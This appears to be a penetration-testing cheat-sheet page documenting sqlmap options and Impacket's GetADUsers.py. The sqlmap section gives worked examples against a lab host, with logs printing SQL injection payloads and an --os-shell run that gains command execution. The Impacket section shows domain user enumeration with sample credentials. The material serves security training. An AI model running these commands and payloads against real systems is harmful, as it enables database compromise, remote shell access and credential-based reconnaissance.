    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, Bearer, ...)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --proxy-freq=PRO..  Requests between change of proxy from a given list
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --retry-on=RETRYON  Retry request on regexp matching content (e.g. "drop")
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Regular requests between visits to a safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --csrf-method=CS..  HTTP method to use during anti-CSRF token page visit
    --csrf-retries=C..  Retries for anti-CSRF token retrieval (default 0)
    --force-ssl         Force usage of SSL/HTTPS
    --chunked           Use HTTP chunked transfer encoded (POST) requests
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
 
  Optimization:
    These options can be used to optimize the performance of sqlmap
 
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
 
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    --statements        Retrieve SQL statements being run on DBMS
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=SQLQ..  SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
 
  Brute force:
    These options can be used to run brute force checks
 
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
    --common-files      Check existence of common files
 
  User-defined function injection:
    These options can be used to create custom user-defined functions
 
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
 
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
 
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
 
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
 
  General:
    These options can be used to set some general working parameters
 
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --base64=BASE64P..  Parameter(s) containing Base64 encoded data
    --base64-safe       Use URL and filename safe Base64 alphabet (RFC 4648)
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing (request)
    --postprocess=PO..  Use given script(s) for postprocessing (response)
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp for filtering targets
    --skip-heuristics   Skip heuristic detection of vulnerabilities
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --table-prefix=T..  Prefix used for temporary tables (default: "sqlmap")
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
 
  Miscellaneous:
    These options do not fit into any other category
 
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --beep              Beep on question and/or when vulnerability is found
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --list-tampers      Display list of available tamper scripts
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --results-file=R..  Location of CSV results file in multiple targets mode
    --shell             Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --unstable          Adjust options for unstable connections
    --update            Update sqlmap
    --wizard            Simple wizard interface for beginner users

Examples

sqlmap -u http://x.x.x.x/dashboard.php –forms –crawl=2 –cookie=”PHPSESSID=ecl57pepe51nq8t020n19eajdc”

This command will use a previously obtained authentication cookie to crawl the provided page and test it for sql injection vulnerabilities.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___["]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                                                                                                 
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 21:56:42 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[21:56:44] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[21:56:44] [INFO] searching for links with depth 1
[21:56:45] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[21:56:47] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[21:56:51] [INFO] found a total of 2 targets
[1/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[21:57:03] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_0957pm.csv' as the CSV results file in multiple targets mode
[21:57:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:04] [INFO] testing if the target URL content is stable
[21:57:04] [INFO] target URL content is stable
[21:57:04] [INFO] testing if GET parameter 'search' is dynamic
[21:57:04] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:57:04] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[21:57:04] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[21:57:04] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:57:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:34] [INFO] testing 'Generic inline queries'
[21:57:34] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[21:57:34] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[21:57:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:34] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[21:57:34] [INFO] testing 'PostgreSQL inline queries'
[21:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                                                                                  
[21:57:44] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[21:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:54] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[21:57:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
sqlmap -u http://x.x.x.x/dashboard.php –forms –crawl=2 –cookie=”PHPSESSID=ecl57pepe51nq8t020n19eajdc” –os-shell

This will attempt to exploit a previously found sql injection vulnerability and return an OS shell.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___[,]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [(]     | .'| . |                                                                                                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 22:04:24 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[22:04:26] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[22:04:26] [INFO] searching for links with depth 1
[22:04:27] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[22:04:29] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[22:04:35] [INFO] found a total of 2 targets
[1/2] Form:
POST http://10.129.95.174
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
POST data: username=&password=
do you want to test this form? [Y/n/q]
> n
[2/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[22:05:11] [INFO] resuming back-end DBMS 'postgresql'
[22:05:11] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_1005pm.csv' as the CSV results file in multiple targets mode
[22:05:11] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[22:05:11] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
[22:05:21] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[22:05:21] [INFO] fingerprinting the back-end DBMS operating system
[22:05:22] [INFO] the back-end DBMS operating system is Linux
[22:05:22] [INFO] testing if current user is DBA
[22:05:22] [INFO] retrieved: '1'
[22:05:22] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[22:05:22] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
[22:05:33] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell>

Blog Posts

GetADUsers.py

Description

Part of the Impacket network tool suite – enumerates all the AD users provided you have valid creds.

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address]
                     target
 
Queries target domain for users data
 
positional arguments:
  target                domain/username[:password]
 
optional arguments:
  -h, --help            show this help message and exit
  -user username        Requests data for specific user
  -all                  Return all users, including those with no email
                        addresses and disabled accounts. When used with -user
                        it will return user's info even if the account is
                        disabled
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter

Examples

 GetADUsers.py hiboxy.com/bgreen:Password1 -dc-ip x.x.x.x -all | tee /tmp/adusers.txt

This command will enumerate all users in the hiboxy domain using the creds for bgreen.

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
[*] Querying 10.130.10.4 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-03-14 14:24:35.183246 2022-03-14 14:24:39.485072
Guest <never> <never>
SROCAdmin 2022-03-14 14:24:43.164622 <never>
krbtgt 2022-03-14 14:31:12.537996 <never>
SVC_SQLService SVC_SQLService@hiboxy.com 2022-03-14 14:32:16.637564 <never>
SVC_SQLService2 2022-03-14 14:32:16.778834 <never>
krosterman 2022-03-14 14:32:16.841622 <never>
smorgan smorgan@hiboxy.com 2022-03-14 14:32:16.904391 <never>
tduncan tduncan@hiboxy.com 2022-03-14 14:32:16.951489 2022-03-14 14:36:23.957238
antivirus 2022-03-14 14:32:17.861892 <never>
aallen 2022-03-14 14:32:17.940372 <never>
aalvarado 2022-03-14 14:32:18.018868 <never>
abaird 2022-03-14 14:32:18.097351 <never>
...
wortega 2022-03-14 14:32:58.110061 <never>
wrobinson 2022-03-14 14:32:58.188474 <never>
wstanley 2022-03-14 14:32:58.251129 <never>
wwade 2022-03-14 14:32:58.329487 <never>
wwilson 2022-03-14 14:32:58.392172 <never>
zclayton 2022-03-14 14:32:58.470533 <never>
$VJ1000-O3GM981V807M <never> <never>
SM_aaa538fcd9a742de9 SystemMailbox{1f05a927-b919-458d-bebd-92c52421d9be}@hiboxy.com <never> <never>
SM_92d45bee00ee49769 SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@hiboxy.com <never> <never>
SM_1f4403d8339543fcb SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@hiboxy.com <never> <never>
SM_54e3d4f14fe84c84a DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@hiboxy.com <never> <never>
SM_035c725ae06c4cf38 Migration.8f3e7716-2011-43e4-96b1-aba62d229136@hiboxy.com <never> <never>
SM_fbadcdb332e74005a FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@hiboxy.com <never> <never>
SM_f804d6dd51144fc5a SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@hiboxy.com <never> <never>
SM_ea5a510e6bfd4c758 SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@hiboxy.com <never> <never>
SM_76b5d049aad445e4a SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@hiboxy.com <never> <never>
HealthMailboxf81d76d HealthMailboxf81d76db0dbd441ba35044828baa42e7@hiboxy.com 2022-03-14 15:16:49.293057 2022-03-15 23:54:55.305462
HealthMailboxd31f130 HealthMailboxd31f130f2c6748c0a6f57fcfb3beec46@hiboxy.com 2022-03-14 15:16:54.265986 2022-03-15 21:43:19.596318

Blog Posts